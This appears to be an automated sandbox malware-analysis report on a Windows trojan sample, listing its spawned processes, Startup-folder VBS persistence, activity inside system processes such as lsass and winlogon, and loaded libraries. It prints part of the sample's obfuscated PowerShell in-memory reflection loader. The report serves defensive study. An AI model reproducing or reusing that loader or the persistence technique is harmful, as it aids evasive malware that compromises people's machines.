                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Code function: 0_2_01E52408
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Code function: 0_2_01E5EC90
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Code function: 0_2_01E50ED9
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Code function: 0_2_01E50E62
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Code function: 0_2_01E50E19
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Code function: 0_2_01E5188F
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Code function: 0_2_07E3D148
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Code function: 0_2_07E20040
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Code function: 0_2_07E2003F
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Code function: 0_2_07E3CDA0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FF848F1DD68
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FF848F1E339
                      Source: C:\Users\user\AppData\Local\Temp\$778e373e Code function: 6_2_00FE15AF
                      Source: C:\Windows\System32\dllhost.exe Code function: 7_3_000001B094BAD49C
                      Source: C:\Windows\System32\dllhost.exe Code function: 7_3_000001B094BA1FB4
                      Source: C:\Windows\System32\dllhost.exe Code function: 7_3_000001B094BB3C08
                      Source: C:\Windows\System32\dllhost.exe Code function: 7_2_0000000140001CE8
                      Source: C:\Windows\System32\dllhost.exe Code function: 7_2_0000000140002D4C
                      Source: C:\Windows\System32\dllhost.exe Code function: 7_2_000000014000242C
                      Source: C:\Windows\System32\dllhost.exe Code function: 7_2_00000001400031D0
                      Source: C:\Windows\System32\dllhost.exe Code function: 7_2_0000000140001274
                      Source: C:\Windows\System32\dllhost.exe Code function: 7_2_000001B094E9E09C
                      Source: C:\Windows\System32\dllhost.exe Code function: 7_2_000001B094EA4808
                      Source: C:\Windows\System32\dllhost.exe Code function: 7_2_000001B094E92BB4
                      Source: C:\Windows\System32\dllhost.exe Code function: 7_2_000001B094EB64CF
                      Source: C:\Windows\System32\winlogon.exe Code function: 8_3_000001E858951FB4
                      Source: C:\Windows\System32\winlogon.exe Code function: 8_3_000001E85895D49C
                      Source: C:\Windows\System32\winlogon.exe Code function: 8_3_000001E858963C08
                      Source: C:\Windows\System32\winlogon.exe Code function: 8_2_000001E858982BB4
                      Source: C:\Windows\System32\winlogon.exe Code function: 8_2_000001E85898E09C
                      Source: C:\Windows\System32\winlogon.exe Code function: 8_2_000001E858994808
                      Source: C:\Windows\System32\lsass.exe Code function: 9_3_00000140ADFCD49C
                      Source: C:\Windows\System32\lsass.exe Code function: 9_3_00000140ADFD3C08
                      Source: C:\Windows\System32\lsass.exe Code function: 9_3_00000140ADFC1FB4
                      Source: C:\Windows\System32\lsass.exe Code function: 9_2_00000140AE874808
                      Source: C:\Windows\System32\lsass.exe Code function: 9_2_00000140AE862BB4
                      Source: C:\Windows\System32\lsass.exe Code function: 9_2_00000140AE86E09C
                      Source: C:\Windows\System32\svchost.exe Code function: 10_3_00000195DD5A3C08
                      Source: C:\Windows\System32\svchost.exe Code function: 10_3_00000195DD59D49C
                      Source: C:\Windows\System32\svchost.exe Code function: 10_3_00000195DD591FB4
                      Source: C:\Windows\System32\svchost.exe Code function: 10_2_00000195DD5D4808
                      Source: C:\Windows\System32\svchost.exe Code function: 10_2_00000195DD5CE09C
                      Source: C:\Windows\System32\svchost.exe Code function: 10_2_00000195DD5C2BB4
                      Source: C:\Windows\System32\dwm.exe Code function: 11_3_000001160CA43C08
                      Source: C:\Windows\System32\dwm.exe Code function: 11_3_000001160CA31FB4
                      Source: C:\Windows\System32\dwm.exe Code function: 11_3_000001160CA3D49C
                      Source: C:\Windows\System32\svchost.exe Code function: 12_3_00000257E107D49C
                      Source: C:\Windows\System32\svchost.exe Code function: 12_3_00000257E1071FB4
                      Source: C:\Windows\System32\svchost.exe Code function: 12_3_00000257E1083C08
                      Source: C:\Windows\System32\svchost.exe Code function: 12_2_00000257E10AE09C
                      Source: C:\Windows\System32\svchost.exe Code function: 12_2_00000257E10A2BB4
                      Source: C:\Windows\System32\svchost.exe Code function: 12_2_00000257E10B4808
                      Source: C:\Windows\System32\svchost.exe Code function: 13_3_000001F28C1D1FB4
                      Source: C:\Windows\System32\svchost.exe Code function: 13_3_000001F28C1E3C08
                      Source: C:\Windows\System32\svchost.exe Code function: 13_3_000001F28C1DD49C
                      Source: C:\Windows\System32\svchost.exe Code function: 13_2_000001F28C93E09C
                      Source: C:\Windows\System32\svchost.exe Code function: 13_2_000001F28C932BB4
                      Source: C:\Windows\System32\svchost.exe Code function: 13_2_000001F28C944808
                      Source: C:\Windows\System32\svchost.exe Code function: 14_3_000001CA97FE3C08
                      Source: C:\Windows\System32\svchost.exe Code function: 14_3_000001CA97FD1FB4
                      Source: C:\Windows\System32\svchost.exe Code function: 14_3_000001CA97FDD49C
                      Source: C:\Windows\System32\svchost.exe Code function: 14_2_000001CA9854E09C
                      Source: C:\Windows\System32\svchost.exe Code function: 14_2_000001CA98542BB4
                      Source: C:\Windows\System32\svchost.exe Code function: 14_2_000001CA98554808
                      Source: C:\Windows\System32\svchost.exe Code function: 15_3_000001D2652ED49C
                      Source: C:\Windows\System32\svchost.exe Code function: 15_3_000001D2652E1FB4
                      Source: C:\Windows\System32\svchost.exe Code function: 15_3_000001D2652F3C08
                      Source: C:\Windows\System32\svchost.exe Code function: 15_2_000001D26531E09C
                      Source: C:\Windows\System32\svchost.exe Code function: 15_2_000001D265312BB4
                      Source: C:\Windows\System32\svchost.exe Code function: 15_2_000001D265324808
                      Source: C:\Windows\System32\svchost.exe Code function: 16_3_00000254A27C1FB4
                      Source: C:\Windows\System32\svchost.exe Code function: 16_3_00000254A27D3C08
                      Source: C:\Windows\System32\svchost.exe Code function: 16_3_00000254A27CD49C
                      Source: C:\Windows\System32\svchost.exe Code function: 16_2_00000254A2D42BB4
                      Source: C:\Windows\System32\svchost.exe Code function: 16_2_00000254A2D4E09C
                      Source: C:\Windows\System32\svchost.exe Code function: 16_2_00000254A2D54808
                      Source: C:\Windows\System32\svchost.exe Code function: 17_3_0000024B87DAD49C
                      Source: C:\Windows\System32\svchost.exe Code function: 17_3_0000024B87DB3C08
                      Source: C:\Windows\System32\svchost.exe Code function: 17_3_0000024B87DA1FB4
                      Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000024B87DDE09C
                      Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000024B87DE4808
                      Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000024B87DD2BB4
                      Source: C:\Windows\System32\svchost.exe Code function: 18_3_00000205FB3CD49C
                      Source: C:\Windows\System32\svchost.exe Code function: 18_3_00000205FB3C1FB4
                      Source: C:\Windows\System32\svchost.exe Code function: 18_3_00000205FB3D3C08
                      Source: C:\Windows\System32\svchost.exe Code function: 18_2_00000205FD40E09C
                      Source: C:\Windows\System32\svchost.exe Code function: 18_2_00000205FD402BB4
                      Source: C:\Windows\System32\svchost.exe Code function: 18_2_00000205FD414808
                      Source: C:\Windows\System32\svchost.exe Code function: 19_3_000001A20567D49C
                      Source: C:\Windows\System32\svchost.exe Code function: 19_3_000001A205671FB4
                      Source: C:\Windows\System32\svchost.exe Code function: 19_3_000001A205683C08
                      Source: C:\Windows\System32\svchost.exe Code function: 19_2_000001A2056AE09C
                      Source: C:\Windows\System32\svchost.exe Code function: 19_2_000001A2056A2BB4
                      Source: C:\Windows\System32\svchost.exe Code function: 19_2_000001A2056B4808
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Code function: 21_2_01AF20D0
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Code function: 21_2_01AF0B50
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Code function: 21_2_01AF0E28
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Code function: 21_2_01AF178D
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Code function: 21_2_01AF2181
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Code function: 21_2_01AF2408
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Code function: 21_2_01AFEC90
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Code function: 21_2_01AF0ED9
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Code function: 21_2_01AF0E19
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Code function: 21_2_01AF0E62
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Code function: 21_2_01AF188F
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Code function: 21_2_07C6D9B0
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Code function: 21_2_07C6D148
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Code function: 21_2_07C50040
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Code function: 21_2_07C5003E
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Code function: 21_2_07C6CDA0
                      Source: C:\Users\user\AppData\Local\Temp\$778e373e Code function: String function: 00FD6A20 appears 32 times
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2329340296.0000000007060000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameLitdkxvz.dll" vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2300253783.0000000003838000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclrjit.dllT vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2300253783.0000000003838000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2300253783.0000000003838000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $jq,\\StringFileInfo\\040904B0\\OriginalFilename vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2336961544.0000000007780000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2298907030.000000000188E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2338353530.0000000007E41000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameKaxhwswfup.exe6 vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006BAD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000000.1944760132.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameKaxhwswfup.exe6 vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006431000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLitdkxvz.dll" vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe | Binary or memory string: OriginalFilenameKaxhwswfup.exe6 vs vm6XYZzWOd.exe
                      Source: vm6XYZzWOd.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: classification engine | Classification label: mal100.spre.troj.expl.evad.winEXE@14/16@495/100
                      Source: C:\Windows\System32\dllhost.exe | Code function: 7_2_0000000140002D4C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 | Code function: 3_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 | Code function: 3_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3228:120:WilError_03
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | File created: C:\Users\user\AppData\Local\Temp\$77a3a3b4
                      Source: C:\Windows\System32\lsass.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs"
                      Source: vm6XYZzWOd.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: vm6XYZzWOd.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: vm6XYZzWOd.exe | ReversingLabs: Detection: 47%
                      Source: vm6XYZzWOd.exe | Virustotal: Detection: 37%
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | File read: C:\Users\user\Desktop\vm6XYZzWOd.exe
                      Source: unknown | Process created: C:\Users\user\Desktop\vm6XYZzWOd.exe "C:\Users\user\Desktop\vm6XYZzWOd.exe"
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Process created: C:\Users\user\AppData\Local\Temp\$77a3a3b4 "C:\Users\user\AppData\Local\Temp\$77a3a3b4"
                      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UKPEWRGEIPej{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$diFffPduGehihq,[Parameter(Position=1)][Type]$PCksoXTjIn)$dnnozXtGtCr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+'m'+''+'o'+'r'+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+'a'+'s'+'s'+''+','+'P'+'u'+''+[Char](98)+''+'l'+''+'i'+'c'+[Char](44)+'S'+'e'+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dnnozXtGtCr.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$diFffPduGehihq).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'tim'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$dnnozXtGtCr.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e','P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$PCksoXTjIn,$diFffPduGehihq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $dnnozXtGtCr.CreateType();}$lVayyyANUYcKS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'st'+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Process created: C:\Users\user\AppData\Local\Temp\$778e373e "C:\Users\user\AppData\Local\Temp\$778e373e"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a7581e3a-9da7-4299-b4e9-0d87c1c78a48}
                      Source: C:\Windows\System32\lsass.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs"
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe "C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe"
                      Source: C:\Windows\System32\dllhost.exe | Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Process created: C:\Users\user\AppData\Local\Temp\$77a3a3b4 "C:\Users\user\AppData\Local\Temp\$77a3a3b4"
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Process created: C:\Users\user\AppData\Local\Temp\$778e373e "C:\Users\user\AppData\Local\Temp\$778e373e"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a7581e3a-9da7-4299-b4e9-0d87c1c78a48}
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe "C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe"
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe | Process created: unknown unknown
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Section loaded: version.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Section loaded: ntmarta.dll
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 | Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 | Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 | Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 | Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 | Section loaded: taskschd.dll
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 | Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 | Section loaded: taskschd.dll
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 | Section loaded: taskschd.dll
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 | Section loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 | Section loaded: taskschd.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\$778e373e | Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\$778e373e | Section loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Local\Temp\$778e373e | Section loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Temp\$778e373e | Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\$778e373e | Section loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\$778e373e | Section loaded: pdh.dll
                      Source: C:\Users\user\AppData\Local\Temp\$778e373e | Section loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\$778e373e | Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\$778e373e | Section loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\$778e373e | Section loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\dllhost.exe | Section loaded: ntmarta.dll
                      Source: C:\Windows\System32\dllhost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\winlogon.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\lsass.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\dwm.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
